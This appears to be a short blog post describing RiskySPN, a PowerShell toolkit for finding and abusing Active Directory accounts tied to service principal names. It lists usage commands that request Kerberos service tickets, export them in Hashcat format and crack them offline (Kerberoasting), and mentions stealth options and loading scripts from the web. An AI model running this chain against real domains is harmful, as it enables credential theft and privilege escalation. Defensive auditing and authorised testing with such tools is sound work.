Categories: Kali Linux

RiskySPN – Collection of PowerShell Scripts Focused on Detecting and Abusing SPNs Accounts

RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.

Also Read Metasploit Framework – A Beginner’s Guide for Penetration Testing, Exploit Development and Vulnerability Research

RiskySPN Usage

Install the module

Import-Module .\RiskySPNs.psm1

Or just load the script (you can also `IEX` from the web)

. .\Find-PotentiallyCrackableAccounts.ps1

Make sure Set-ExecutionPolicy is Unrestricted or Bypass

Get information about a function

Get-Help Get-TGSCipher -Full

All functions also have the -Verbosemode

Search vulnerable SPNs

Find vulnerable accounts

Find-PotentiallyCrackableAccounts

Sensitive + RC4 = $$$

Generate full detailed report about vulnerable accounts (CISO <3)

Export-PotentiallyCrackableAccounts

Get tickets

Request Kerberos TGS for SPN

Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

Or

Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

The fun stuff 🙂

Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3

Related

Max : Maximizing BloodHound With A Simple Suite Of Tools

April 19, 2021

In "Kali Linux"

PowerSploit : A PowerShell Post-Exploitation Framework

May 12, 2020

In "Kali Linux"

Invoke-Antivm : Powershell Tool For VM Evasion

November 25, 2020

In "Kali Linux"

R K

Next Mallet - A Framework For Creating Proxies »

Previous « PowerUpSQL Tool kit to Audit SQL Server for Weak Configuration Auditing, Privilege Escalation on Scale, and Post Exploitation Attacks

Share

Published by

R K

Tags: PowerShellRiskySPNscriptSPN

8 years ago

Recent Posts

How To

Bash Scripting Best Practices Every Beginner Should Know

Introduction Bash scripting is a powerful way to automate Linux tasks, but writing a script…

7 hours ago

How To

How To Create A Self-Signed SSL Certificate Using Bash And OpenSSL

Introduction A self-signed SSL certificate is a certificate that is created and signed by the…

8 hours ago

How To

How To Debug Bash Scripts Using bash -x And set Commands

Introduction Debugging is an important part of Bash scripting. When a script does not work…

12 hours ago

How To

How To Use Cron Jobs With Bash Scripts For Automation

Introduction Cron jobs are used in Linux to run commands or Bash scripts automatically at…

13 hours ago

How To

How To Use Pipes In Bash Scripts For Command Chaining

Introduction Pipes are an important feature in Linux and Bash scripting. A pipe allows you…

14 hours ago

How To

How To Use grep, awk, And sed In Bash Scripts

Introduction The grep, awk, and sed commands are powerful text-processing tools in Linux. They are…

15 hours ago

L